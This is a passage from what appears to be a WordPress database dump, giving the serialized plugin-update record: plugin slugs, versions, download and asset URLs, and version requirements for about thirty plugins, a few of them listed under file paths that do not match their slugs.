.org/motopress-hotel-booking-lite/assets/banner-772x250.jpg?rev=2723398\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.7\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";s:3:\"7.0\";}s:41:\"add-search-to-menu/add-search-to-menu.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:32:\"w.org/plugins/add-search-to-menu\";s:4:\"slug\";s:18:\"add-search-to-menu\";s:6:\"plugin\";s:41:\"add-search-to-menu/add-search-to-menu.php\";s:11:\"new_version\";s:5:\"5.5.2\";s:3:\"url\";s:49:\"https://wordpress.org/plugins/add-search-to-menu/\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/plugin/add-search-to-menu.5.5.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/add-search-to-menu/assets/icon-256x256.png?rev=2077748\";s:2:\"1x\";s:71:\"https://ps.w.org/add-search-to-menu/assets/icon-128x128.png?rev=2077748\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:74:\"https://ps.w.org/add-search-to-menu/assets/banner-1544x500.png?rev=2077748\";s:2:\"1x\";s:73:\"https://ps.w.org/add-search-to-menu/assets/banner-772x250.png?rev=2317518\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.9\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:42:\"add-search-to-menu/add-search-to-menuh.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:32:\"w.org/plugins/add-search-to-menu\";s:4:\"slug\";s:18:\"add-search-to-menu\";s:6:\"plugin\";s:42:\"add-search-to-menu/add-search-to-menuh.php\";s:11:\"new_version\";s:5:\"5.5.2\";s:3:\"url\";s:49:\"https://wordpress.org/plugins/add-search-to-menu/\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/plugin/add-search-to-menu.5.5.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/add-search-to-menu/assets/icon-256x256.png?rev=2077748\";s:2:\"1x\";s:71:\"https://ps.w.org/add-search-to-menu/assets/icon-128x128.png?rev=2077748\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:74:\"https://ps.w.org/add-search-to-menu/assets/banner-1544x500.png?rev=2077748\";s:2:\"1x\";s:73:\"https://ps.w.org/add-search-to-menu/assets/banner-772x250.png?rev=2317518\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.9\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:37:\"optinmonster/optin-monster-wp-api.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:26:\"w.org/plugins/optinmonster\";s:4:\"slug\";s:12:\"optinmonster\";s:6:\"plugin\";s:37:\"optinmonster/optin-monster-wp-api.php\";s:11:\"new_version\";s:6:\"2.14.1\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/optinmonster/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/optinmonster.2.14.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/optinmonster/assets/icon-256x256.png?rev=1145864\";s:2:\"1x\";s:65:\"https://ps.w.org/optinmonster/assets/icon-128x128.png?rev=1145864\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/optinmonster/assets/banner-1544x500.png?rev=2311621\";s:2:\"1x\";s:67:\"https://ps.w.org/optinmonster/assets/banner-772x250.png?rev=2311621\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.7\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";s:3:\"5.3\";}s:27:\"rafflepress/rafflepress.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:25:\"w.org/plugins/rafflepress\";s:4:\"slug\";s:11:\"rafflepress\";s:6:\"plugin\";s:27:\"rafflepress/rafflepress.php\";s:11:\"new_version\";s:6:\"1.12.2\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/rafflepress/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/rafflepress.1.12.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/rafflepress/assets/icon-256x256.png?rev=2117711\";s:2:\"1x\";s:64:\"https://ps.w.org/rafflepress/assets/icon-128x128.png?rev=2117711\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/rafflepress/assets/banner-1544x500.png?rev=2117708\";s:2:\"1x\";s:66:\"https://ps.w.org/rafflepress/assets/banner-772x250.png?rev=2120278\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.8\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";s:5:\"5.3.3\";}s:35:\"google-site-kit/google-site-kit.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:29:\"w.org/plugins/google-site-kit\";s:4:\"slug\";s:15:\"google-site-kit\";s:6:\"plugin\";s:35:\"google-site-kit/google-site-kit.php\";s:11:\"new_version\";s:7:\"1.111.1\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/google-site-kit/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/google-site-kit.1.111.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/google-site-kit/assets/icon-256x256.png?rev=2181376\";s:2:\"1x\";s:68:\"https://ps.w.org/google-site-kit/assets/icon-128x128.png?rev=2181376\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/google-site-kit/assets/banner-1544x500.png?rev=2513620\";s:2:\"1x\";s:70:\"https://ps.w.org/google-site-kit/assets/banner-772x250.png?rev=2513620\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.2\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";s:3:\"5.6\";}s:35:\"ultimate-blocks/ultimate-blocks.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:29:\"w.org/plugins/ultimate-blocks\";s:4:\"slug\";s:15:\"ultimate-blocks\";s:6:\"plugin\";s:35:\"ultimate-blocks/ultimate-blocks.php\";s:11:\"new_version\";s:5:\"3.0.5\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/ultimate-blocks/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/ultimate-blocks.3.0.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/ultimate-blocks/assets/icon-256x256.png?rev=2966061\";s:2:\"1x\";s:68:\"https://ps.w.org/ultimate-blocks/assets/icon-128x128.png?rev=2966061\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/ultimate-blocks/assets/banner-1544x500.png?rev=2966061\";s:2:\"1x\";s:70:\"https://ps.w.org/ultimate-blocks/assets/banner-772x250.png?rev=2966061\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";s:3:\"5.6\";}s:29:\"use-any-font/use-any-font.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:26:\"w.org/plugins/use-any-font\";s:4:\"slug\";s:12:\"use-any-font\";s:6:\"plugin\";s:29:\"use-any-font/use-any-font.php\";s:11:\"new_version\";s:6:\"6.3.04\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/use-any-font/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/use-any-font.6.3.04.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:65:\"https://ps.w.org/use-any-font/assets/icon-128x128.png?rev=2460363\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/use-any-font/assets/banner-1544x500.jpg?rev=2461119\";s:2:\"1x\";s:67:\"https://ps.w.org/use-any-font/assets/banner-772x250.png?rev=2461119\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.0\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";b:0;}s:31:\"wp-all-export/wp-all-export.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:27:\"w.org/plugins/wp-all-export\";s:4:\"slug\";s:13:\"wp-all-export\";s:6:\"plugin\";s:31:\"wp-all-export/wp-all-export.php\";s:11:\"new_version\";s:5:\"1.4.0\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/wp-all-export/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/wp-all-export.1.4.0.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/wp-all-export/assets/icon-256x256.png?rev=2570162\";s:2:\"1x\";s:66:\"https://ps.w.org/wp-all-export/assets/icon-128x128.png?rev=2570162\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/wp-all-export/assets/banner-1544x500.png?rev=2570162\";s:2:\"1x\";s:68:\"https://ps.w.org/wp-all-export/assets/banner-772x250.png?rev=2570162\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";b:0;}s:24:\"wpforms-lite/wpforms.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:26:\"w.org/plugins/wpforms-lite\";s:4:\"slug\";s:12:\"wpforms-lite\";s:6:\"plugin\";s:24:\"wpforms-lite/wpforms.php\";s:11:\"new_version\";s:7:\"1.8.4.1\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/wpforms-lite/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/wpforms-lite.1.8.4.1.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:57:\"https://ps.w.org/wpforms-lite/assets/icon.svg?rev=2574198\";s:3:\"svg\";s:57:\"https://ps.w.org/wpforms-lite/assets/icon.svg?rev=2574198\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/wpforms-lite/assets/banner-1544x500.png?rev=2602491\";s:2:\"1x\";s:67:\"https://ps.w.org/wpforms-lite/assets/banner-772x250.png?rev=2602491\";}s:11:\"banners_rtl\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/wpforms-lite/assets/banner-1544x500-rtl.png?rev=2602491\";s:2:\"1x\";s:71:\"https://ps.w.org/wpforms-lite/assets/banner-772x250-rtl.png?rev=2602491\";}s:8:\"requires\";s:3:\"5.5\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";s:3:\"7.0\";}s:24:\"wordpress-seo/wp-seo.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:27:\"w.org/plugins/wordpress-seo\";s:4:\"slug\";s:13:\"wordpress-seo\";s:6:\"plugin\";s:24:\"wordpress-seo/wp-seo.php\";s:11:\"new_version\";s:4:\"21.4\";s:3:\"url\";s:44:\"https://wordpress.org/plugins/wordpress-seo/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/wordpress-seo.21.4.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=2363699\";s:3:\"svg\";s:58:\"https://ps.w.org/wordpress-seo/assets/icon.svg?rev=2363699\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:69:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500.png?rev=2643727\";s:2:\"1x\";s:68:\"https://ps.w.org/wordpress-seo/assets/banner-772x250.png?rev=2643727\";}s:11:\"banners_rtl\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/wordpress-seo/assets/banner-1544x500-rtl.png?rev=2643727\";s:2:\"1x\";s:72:\"https://ps.w.org/wordpress-seo/assets/banner-772x250-rtl.png?rev=2643727\";}s:8:\"requires\";s:3:\"6.2\";s:6:\"tested\";s:5:\"6.3.2\";s:12:\"requires_php\";s:5:\"7.2.5\";}s:27:\"js_composer/js_composer.php\";O:8:\"stdClass\":6:{s:4:\"slug\";s:11:\"js_composer\";s:11:\"new_version\";s:3:\"7.1\";s:6:\"plugin\";s:27:\"js_composer/js_composer.php\";s:3:\"url\";s:0:\"\";s:7:\"package\";b:0;s:4:\"name\";s:21:\"WPBakery Page Builder\";}s:41:\"Ultimate_VC_Addons/Ultimate_VC_Addons.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:7:\"6892199\";s:4:\"slug\";s:18:\"Ultimate_VC_Addons\";s:6:\"plugin\";s:41:\"Ultimate_VC_Addons/Ultimate_VC_Addons.php\";s:14:\"upgrade_notice\";s:59:\" Please activate your license to receive automatic updates.\";s:11:\"new_version\";s:7:\"3.19.19\";s:3:\"url\";s:74:\"https://codecanyon.net/cart/add_items?item_ids=6892199&ref=BrainstormForce\";s:7:\"package\";s:0:\"\";s:6:\"tested\";s:3:\"6.0\";s:12:\"requires_php\";s:0:\"\";s:5:\"icons\";a:3:{s:2:\"1x\";s:65:\"//support.brainstormforce.com/wp-content/uploads/2017/07/uavc.jpg\";s:2:\"2x\";s:65:\"//support.brainstormforce.com/wp-content/uploads/2017/07/uavc.jpg\";s:7:\"default\";s:65:\"//support.brainstormforce.com/wp-content/uploads/2017/07/uavc.jpg\";}}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:16:{s:45:\"advanced-backgrounds/advanced-backgrounds.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:34:\"w.org/plugins/advanced-backgrounds\";s:4:\"slug\";s:20:\"advanced-backgrounds\";s:6:\"plugin\";s:45:\"advanced-backgrounds/advanced-backgrounds.php\";s:11:\"new_version\";s:6:\"1.11.4\";s:3:\"url\";s:51:\"https://wordpress.org/plugins/advanced-backgrounds/\";s:7:\"package\";s:70:\"https://downloads.wordpress.org/plugin/advanced-backgrounds.1.11.4.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/advanced-backgrounds/assets/icon-256x256.png?rev=2386996\";s:2:\"1x\";s:73:\"https://ps.w.org/advanced-backgrounds/assets/icon-128x128.png?rev=2386996\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/advanced-backgrounds/assets/banner-1544x500.png?rev=2386996\";s:2:\"1x\";s:75:\"https://ps.w.org/advanced-backgrounds/assets/banner-772x250.png?rev=2386996\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.8\";}s:33:\"classic-editor/classic-editor.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:28:\"w.org/plugins/classic-editor\";s:4:\"slug\";s:14:\"classic-editor\";s:6:\"plugin\";s:33:\"classic-editor/classic-editor.php\";s:11:\"new_version\";s:5:\"1.6.3\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/classic-editor/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/classic-editor.1.6.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/classic-editor/assets/icon-256x256.png?rev=1998671\";s:2:\"1x\";s:67:\"https://ps.w.org/classic-editor/assets/icon-128x128.png?rev=1998671\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/classic-editor/assets/banner-1544x500.png?rev=1998671\";s:2:\"1x\";s:69:\"https://ps.w.org/classic-editor/assets/banner-772x250.png?rev=1998676\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.9\";}s:42:\"contact-form-cfdb7/contact-form-cfdb-7.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:32:\"w.org/plugins/contact-form-cfdb7\";s:4:\"slug\";s:18:\"contact-form-cfdb7\";s:6:\"plugin\";s:42:\"contact-form-cfdb7/contact-form-cfdb-7.php\";s:11:\"new_version\";s:7:\"1.2.6.7\";s:3:\"url\";s:49:\"https://wordpress.org/plugins/contact-form-cfdb7/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/contact-form-cfdb7.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/contact-form-cfdb7/assets/icon-256x256.png?rev=1619878\";s:2:\"1x\";s:71:\"https://ps.w.org/contact-form-cfdb7/assets/icon-128x128.png?rev=1619878\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:73:\"https://ps.w.org/contact-form-cfdb7/assets/banner-772x250.png?rev=1619902\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.8\";}s:39:\"easy-google-fonts/easy-google-fonts.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:31:\"w.org/plugins/easy-google-fonts\";s:4:\"slug\";s:17:\"easy-google-fonts\";s:6:\"plugin\";s:39:\"easy-google-fonts/easy-google-fonts.php\";s:11:\"new_version\";s:5:\"2.0.4\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/easy-google-fonts/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/easy-google-fonts.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/easy-google-fonts/assets/icon-256x256.png?rev=2562365\";s:2:\"1x\";s:70:\"https://ps.w.org/easy-google-fonts/assets/icon-128x128.png?rev=2562365\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/easy-google-fonts/assets/banner-1544x500.png?rev=2562366\";s:2:\"1x\";s:72:\"https://ps.w.org/easy-google-fonts/assets/banner-772x250.png?rev=2562365\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.8\";}s:9:\"hello.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/hello-dolly\";s:4:\"slug\";s:11:\"hello-dolly\";s:6:\"plugin\";s:9:\"hello.php\";s:11:\"new_version\";s:5:\"1.7.2\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/hello-dolly/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/plugin/hello-dolly.1.7.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-256x256.jpg?rev=2052855\";s:2:\"1x\";s:64:\"https://ps.w.org/hello-dolly/assets/icon-128x128.jpg?rev=2052855\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/hello-dolly/assets/banner-1544x500.jpg?rev=2645582\";s:2:\"1x\";s:66:\"https://ps.w.org/hello-dolly/assets/banner-772x250.jpg?rev=2052855\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"4.6\";}s:22:\"mity-pro/pros-cons.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:30:\"w.org/plugins/mighty-pros-cons\";s:4:\"slug\";s:16:\"mighty-pros-cons\";s:6:\"plugin\";s:22:\"mity-pro/pros-cons.php\";s:11:\"new_version\";s:5:\"1.2.6\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/mighty-pros-cons/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/mighty-pros-cons.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:69:\"https://ps.w.org/mighty-pros-cons/assets/icon-128x128.png?rev=2088315\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:72:\"https://ps.w.org/mighty-pros-cons/assets/banner-1544X500.jpg?rev=2088315\";s:2:\"1x\";s:71:\"https://ps.w.org/mighty-pros-cons/assets/banner-772x250.jpg?rev=2088315\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.0\";}s:29:\"pdf-embedder/pdf_embedder.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:26:\"w.org/plugins/pdf-embedder\";s:4:\"slug\";s:12:\"pdf-embedder\";s:6:\"plugin\";s:29:\"pdf-embedder/pdf_embedder.php\";s:11:\"new_version\";s:5:\"4.6.4\";s:3:\"url\";s:43:\"https://wordpress.org/plugins/pdf-embedder/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/pdf-embedder.4.6.4.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/pdf-embedder/assets/icon-256x256.png?rev=2292517\";s:2:\"1x\";s:65:\"https://ps.w.org/pdf-embedder/assets/icon-128x128.png?rev=2292517\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/pdf-embedder/assets/banner-1544x500.png?rev=2292517\";s:2:\"1x\";s:67:\"https://ps.w.org/pdf-embedder/assets/banner-772x250.png?rev=2292517\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"5.2.0\";}s:26:\"seoplugins/linkpreview.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:25:\"w.org/plugins/linkpreview\";s:4:\"slug\";s:11:\"linkpreview\";s:6:\"plugin\";s:26:\"seoplugins/linkpreview.php\";s:11:\"new_version\";s:5:\"1.6.7\";s:3:\"url\";s:42:\"https://wordpress.org/plugins/linkpreview/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/plugin/linkpreview.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:64:\"https://ps.w.org/linkpreview/assets/icon-256x256.jpg?rev=1110936\";s:2:\"1x\";s:64:\"https://ps.w.org/linkpreview/assets/icon-128x128.jpg?rev=1110178\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:66:\"https://ps.w.org/linkpreview/assets/banner-772x250.jpg?rev=1110177\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.3\";}s:35:\"protect-uploads/protect-uploads.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:29:\"w.org/plugins/protect-uploads\";s:4:\"slug\";s:15:\"protect-uploads\";s:6:\"plugin\";s:35:\"protect-uploads/protect-uploads.php\";s:11:\"new_version\";s:5:\"0.5.2\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/protect-uploads/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/protect-uploads.0.5.2.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/protect-uploads/assets/icon-256x256.png?rev=2779778\";s:2:\"1x\";s:68:\"https://ps.w.org/protect-uploads/assets/icon-128x128.png?rev=2779778\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/protect-uploads/assets/banner-1544x500.png?rev=2779778\";s:2:\"1x\";s:70:\"https://ps.w.org/protect-uploads/assets/banner-772x250.png?rev=2779778\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"3.0.1\";}s:38:\"recent-tweets-widget/recent-tweets.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:34:\"w.org/plugins/recent-tweets-widget\";s:4:\"slug\";s:20:\"recent-tweets-widget\";s:6:\"plugin\";s:38:\"recent-tweets-widget/recent-tweets.php\";s:11:\"new_version\";s:5:\"1.6.8\";s:3:\"url\";s:51:\"https://wordpress.org/plugins/recent-tweets-widget/\";s:7:\"package\";s:69:\"https://downloads.wordpress.org/plugin/recent-tweets-widget.1.6.8.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:73:\"https://ps.w.org/recent-tweets-widget/assets/icon-256x256.png?rev=2529245\";s:2:\"1x\";s:73:\"https://ps.w.org/recent-tweets-widget/assets/icon-128x128.png?rev=2529245\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:75:\"https://ps.w.org/recent-tweets-widget/assets/banner-772x250.png?rev=2529245\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"3.4.1\";}s:51:\"ti-woocommerce-wishlist/ti-woocommerce-wishlist.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:37:\"w.org/plugins/ti-woocommerce-wishlist\";s:4:\"slug\";s:23:\"ti-woocommerce-wishlist\";s:6:\"plugin\";s:51:\"ti-woocommerce-wishlist/ti-woocommerce-wishlist.php\";s:11:\"new_version\";s:5:\"2.7.4\";s:3:\"url\";s:54:\"https://wordpress.org/plugins/ti-woocommerce-wishlist/\";s:7:\"package\";s:72:\"https://downloads.wordpress.org/plugin/ti-woocommerce-wishlist.2.7.4.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:76:\"https://ps.w.org/ti-woocommerce-wishlist/assets/icon-256x256.gif?rev=2469447\";s:2:\"1x\";s:76:\"https://ps.w.org/ti-woocommerce-wishlist/assets/icon-128x128.gif?rev=2469447\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:79:\"https://ps.w.org/ti-woocommerce-wishlist/assets/banner-1544x500.png?rev=2071101\";s:2:\"1x\";s:78:\"https://ps.w.org/ti-woocommerce-wishlist/assets/banner-772x250.png?rev=2071101\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.1\";}s:16:\"v-form/vform.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:20:\"w.org/plugins/v-form\";s:4:\"slug\";s:6:\"v-form\";s:6:\"plugin\";s:16:\"v-form/vform.php\";s:11:\"new_version\";s:3:\"2.0\";s:3:\"url\";s:37:\"https://wordpress.org/plugins/v-form/\";s:7:\"package\";s:49:\"https://downloads.wordpress.org/plugin/v-form.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:51:\"https://ps.w.org/v-form/assets/icon.svg?rev=2910286\";s:3:\"svg\";s:51:\"https://ps.w.org/v-form/assets/icon.svg?rev=2910286\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:62:\"https://ps.w.org/v-form/assets/banner-1544x500.jpg?rev=2910286\";s:2:\"1x\";s:61:\"https://ps.w.org/v-form/assets/banner-772x250.jpg?rev=2910286\";}s:11:\"banners_rtl\";a:2:{s:2:\"2x\";s:66:\"https://ps.w.org/v-form/assets/banner-1544x500-rtl.jpg?rev=2910286\";s:2:\"1x\";s:65:\"https://ps.w.org/v-form/assets/banner-772x250-rtl.jpg?rev=2910286\";}s:8:\"requires\";s:3:\"5.6\";}s:32:\"white-label-cms/wlcms-plugin.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:29:\"w.org/plugins/white-label-cms\";s:4:\"slug\";s:15:\"white-label-cms\";s:6:\"plugin\";s:32:\"white-label-cms/wlcms-plugin.php\";s:11:\"new_version\";s:3:\"2.6\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/white-label-cms/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/white-label-cms.2.6.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/white-label-cms/assets/icon-256x256.png?rev=1977768\";s:2:\"1x\";s:68:\"https://ps.w.org/white-label-cms/assets/icon-128x128.png?rev=1977768\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:71:\"https://ps.w.org/white-label-cms/assets/banner-1544x500.png?rev=2010322\";s:2:\"1x\";s:70:\"https://ps.w.org/white-label-cms/assets/banner-772x250.png?rev=2010322\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"3.3\";}s:41:\"wordpress-importer/wordpress-importer.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:32:\"w.org/plugins/wordpress-importer\";s:4:\"slug\";s:18:\"wordpress-importer\";s:6:\"plugin\";s:41:\"wordpress-importer/wordpress-importer.php\";s:11:\"new_version\";s:5:\"0.8.1\";s:3:\"url\";s:49:\"https://wordpress.org/plugins/wordpress-importer/\";s:7:\"package\";s:67:\"https://downloads.wordpress.org/plugin/wordpress-importer.0.8.1.zip\";s:5:\"icons\";a:2:{s:2:\"1x\";s:63:\"https://ps.w.org/wordpress-importer/assets/icon.svg?rev=2791650\";s:3:\"svg\";s:63:\"https://ps.w.org/wordpress-importer/assets/icon.svg?rev=2791650\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:72:\"https://ps.w.org/wordpress-importer/assets/banner-772x250.png?rev=547654\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"5.2\";}s:32:\"wp-google-fonts/google-fonts.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:29:\"w.org/plugins/wp-google-fonts\";s:4:\"slug\";s:15:\"wp-google-fonts\";s:6:\"plugin\";s:32:\"wp-google-fonts/google-fonts.php\";s:11:\"new_version\";s:5:\"3.1.5\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/wp-google-fonts/\";s:7:\"package\";s:64:\"https://downloads.wordpress.org/plugin/wp-google-fonts.3.1.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:68:\"https://ps.w.org/wp-google-fonts/assets/icon-256x256.png?rev=2223099\";s:2:\"1x\";s:68:\"https://ps.w.org/wp-google-fonts/assets/icon-128x128.png?rev=2223099\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:70:\"https://ps.w.org/wp-google-fonts/assets/banner-772x250.png?rev=2223099\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:5:\"2.0.2\";}s:33:\"duplicate-post/duplicate-post.php\";O:8:\"stdClass\":10:{s:2:\"id\";s:28:\"w.org/plugins/duplicate-post\";s:4:\"slug\";s:14:\"duplicate-post\";s:6:\"plugin\";s:33:\"duplicate-post/duplicate-post.php\";s:11:\"new_version\";s:3:\"4.5\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/duplicate-post/\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/plugin/duplicate-post.4.5.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/duplicate-post/assets/icon-256x256.png?rev=2336666\";s:2:\"1x\";s:67:\"https://ps.w.org/duplicate-post/assets/icon-128x128.png?rev=2336666\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/duplicate-post/assets/banner-1544x500.png?rev=2336666\";s:2:\"1x\";s:69:\"https://ps.w.org/duplicate-post/assets/banner-772x250.png?rev=2336666\";}s:11:\"banners_rtl\";a:0:{}s:8:\"requires\";s:3:\"6.2\";}}}','no');
